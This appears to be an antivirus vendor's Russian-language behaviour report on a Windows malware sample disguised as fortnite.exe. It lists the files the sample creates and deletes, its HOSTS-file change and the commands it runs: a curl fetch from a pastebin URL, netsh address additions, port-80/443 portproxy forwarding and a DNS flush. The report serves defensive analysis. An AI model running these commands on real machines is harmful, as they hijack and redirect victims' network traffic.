Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\aute501.tmp
- %TEMP%\fortnite.exe
- %TEMP%\aute772.tmp
- %WINDIR%\syswow64\k.bat
Удаляет следующие файлы
- %TEMP%\aute501.tmp
- %TEMP%\aute772.tmp
- %WINDIR%\syswow64\k.bat
Изменяет файл HOSTS.
Другое
Создает и запускает на исполнение
- '%TEMP%\fortnite.exe'
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\k.bat' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\k.bat
- '%WINDIR%\syswow64\net.exe' start iphlpsvc
- '%WINDIR%\syswow64\net1.exe' start iphlpsvc
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\netsh.exe' interface ip set dns "Loopback Pseudo-Interface 1" dhcp
- '%WINDIR%\syswow64\netsh.exe' interface ipv6 add address 1 2400:1a00:0:ad38::3/64
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 202.166.193.3/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' int ip add addr 1 198.91.81.12/32 st=ac sk=tr
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=80 connectaddress=
- '%WINDIR%\syswow64\netsh.exe' interface portproxy add v4tov4 listenport=443 listenaddress=0.0.0.0 connectport=443 connectaddress=
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns
